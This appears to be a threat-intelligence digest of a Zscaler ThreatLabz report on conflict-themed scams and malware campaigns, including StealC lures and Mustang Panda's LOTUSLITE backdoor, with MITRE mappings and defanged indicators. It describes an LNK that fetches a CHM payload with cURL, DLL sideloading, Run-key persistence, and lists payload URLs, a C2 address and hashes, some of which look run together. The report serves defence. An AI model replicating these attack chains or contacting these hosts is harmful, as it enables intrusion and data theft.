Threat Research

Middle East Conflict Fuels Opportunistic Cyber Attacks

ZScaler
Middle East Conflict Fuels Opportunistic Cyber Attacks

Zscaler ThreatLabz documented a surge of Middle East conflict-themed campaigns that include fake news blogs, fraudulent portals and storefronts, donation scams, meme-coin pump-and-dump promotions, and multiple malware delivery chains leveraging LNK/CHM, DLL sideloading, and in-memory shellcode. Notable detections include Mustang Panda using a LOTUSLITE chain via libmemobook.dll and Kugou sideloading, and web-based lures delivering StealC; #LOTUSLITE #StealC

Keypoints

  • ThreatLabz identified over 8,000 newly registered conflict-themed domains, many currently inactive but potentially weaponizable for future campaigns.
  • A targeted GCC-region attack used a ZIP with an LNK that downloaded a malicious CHM, which extracted a shellcode loader and a decoy PDF about missile strikes to lure victims.
  • Mustang Panda distributed the LOTUSLITE backdoor via DLL sideloading: a renamed legitimate KuGou executable sideloaded libmemobook.dll which deployed LOTUSLITE components and used C2 172.81.60[.]97.
  • Fake news blogs and file-hosting pages delivered StealC in password-protected ZIPs, with malicious JavaScript detecting device type to tailor redirects.
  • Multiple phishing and scam sites impersonated legitimate services (e.g., a fake SSA portal and an Israeli toll-payment site), collected victim data, and in some cases forwarded submissions to a Telegram bot.
  • Conflict-themed donation and storefront sites routed payments to suspicious GPay identifiers or cryptocurrency addresses, and meme-coin promotions showed pump-and-dump behavior.

MITRE Techniques

  • [T1204.002 ] User Execution: Malicious File – The campaign used a Windows LNK file to initiate the attack and download a CHM defanged payload (‘The ZIP archive contains an LNK file named photo_2026-03-01_01-20-48.pdf.lnk. The LNK’s target command line uses cURL to download a malicious CHM file from hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png.’)
  • [T1105 ] Ingress Tool Transfer – Downloaded next-stage payloads and archives from attacker-controlled or compromised web locations (‘The LNK’s target command line uses cURL to download a malicious CHM file from hxxps://www.360printsol[.]com/…’, and shellcode fetched KApp.rar/KAppl.rar from www.e-kflower[.]com)
  • [T1574.002 ] DLL Side-Loading – Legitimate host binaries (ShellFolder.exe, WebFeatures.exe/SafeChrome.exe) were used to sideload malicious DLLs (ShellFolderDepend.dll, kugou.dll) (‘ShellFolder.exe uses DLL sideloading to load a malicious DLL named ShellFolderDepend.dll.’ )
  • [T1547.001 ] Registry Run Keys/Startup Folder – Persistence established by creating Run keys via reg.exe or RegSetValueExA to launch installed components (‘reg.exe ADD HKCUSoftwareMicrosoftWindowsCurrentVersionRun … BaiNetdisk’ and ‘The downloader creates a Windows Run key HKCUSoftwareMicrosoftWindowsCurrentVersionRunACboardC and sets it to: C:ProgramDataCClipboardCmSafeChrome.exe.’)
  • [T1027 ] Obfuscated Files or Information – Use of encrypted and highly obfuscated shellcode and embedded encrypted payloads to hide malicious functionality (‘shellcode loader, a highly obfuscated shellcode, and eventually a backdoor.’ and ‘The DLL calls the Windows Native API SystemFunction033 (RC4) to decrypt shellcode stored in Shelter.ex’)
  • [T1071.001 ] Application Layer Protocol – HTTP(S) used for C2 and payload retrieval, with traffic obfuscation via a hardcoded User-Agent and a C2 IP (‘The shellcode hardcodes the User-Agent … to mimic legitimate Chrome browser activity.’ and ‘use of the same C2 IP address: 172.81.60[.]97.’)
  • [T1566 ] Phishing – Fraudulent replica sites and fake payment/portal pages used to collect credentials and trick victims into installing remote-management software (‘cfgomma[.]com hosted a fraudulent replica of the US Social Security Administration (SSA) portal’ and fake Kvish 6 toll site collected payment details)
  • [T1567 ] Exfiltration Over Web Service – Collected victim-submitted data forwarded to a third-party web service (Telegram bot) for attacker retrieval (‘The submitted data is forwarded to a Telegram bot.’)
  • [T1059.003 ] Command and Scripting Interpreter (Windows Command Shell) – Use of shell commands (cURL invocation via LNK) to retrieve remote payloads (‘The LNK’s target command line uses cURL to download a malicious CHM file…’)

Indicators of Compromise

  • [Domains ] conflict-themed lures and payload hosts – www.360printsol[.]com (CHM hosting/download), e-kflower[.]com (staging payloads), and dozens of newly registered conflict-themed domains such as nowarwithiran[.]store, irandonation[.]org, goldman-iran-krieg[.]pages[.]dev
  • [Redirecting domains ] redirectors used in web campaigns – flourishingscreencousin[.]com, Holidayslettucecircumvent[.]com
  • [File names ] malicious and decoy filenames observed – photo_2026-03-01_01-20-48.pdf.lnk (initial LNK), ShellFolderDepend.dll (malicious DLL sideloaded), Iran Strikes U.S. Military Facilities Across Gulf Region.exe (renamed legitimate host), and Shelter.ex (embedded encrypted shellcode)
  • [File hashes ] observed payload hashes – libmemobook.dll: 6accd57e48c34cadc998d00594229e42Be34901237c9fa9563e8dc9e71faf3a7e68f983f4fb9b5d115bceee45a89447fb2565faef07452cda6b8e244e53ad91499c3d9b5, kugou.dll: 10fb1122079b5ae8e4147253a937f40f7d4e31c8b11be7c970860c4fbc8fe85c70724cb18564763407064117726211ff8f89555e5a3b2b70bc9667032abd69cbe53b5216 (and other hashes reported)
  • [IP addresses ] command-and-control – 172.81.60[.]97 (LOTUSLITE C2)
  • [URLs ] specific payload URLs observed – hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png (CHM download), www.e-kflower[.]com/_prozn/_skin_mbl/home/KApp.rar and /KAppl.rar (staged payloads)

Read more: https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint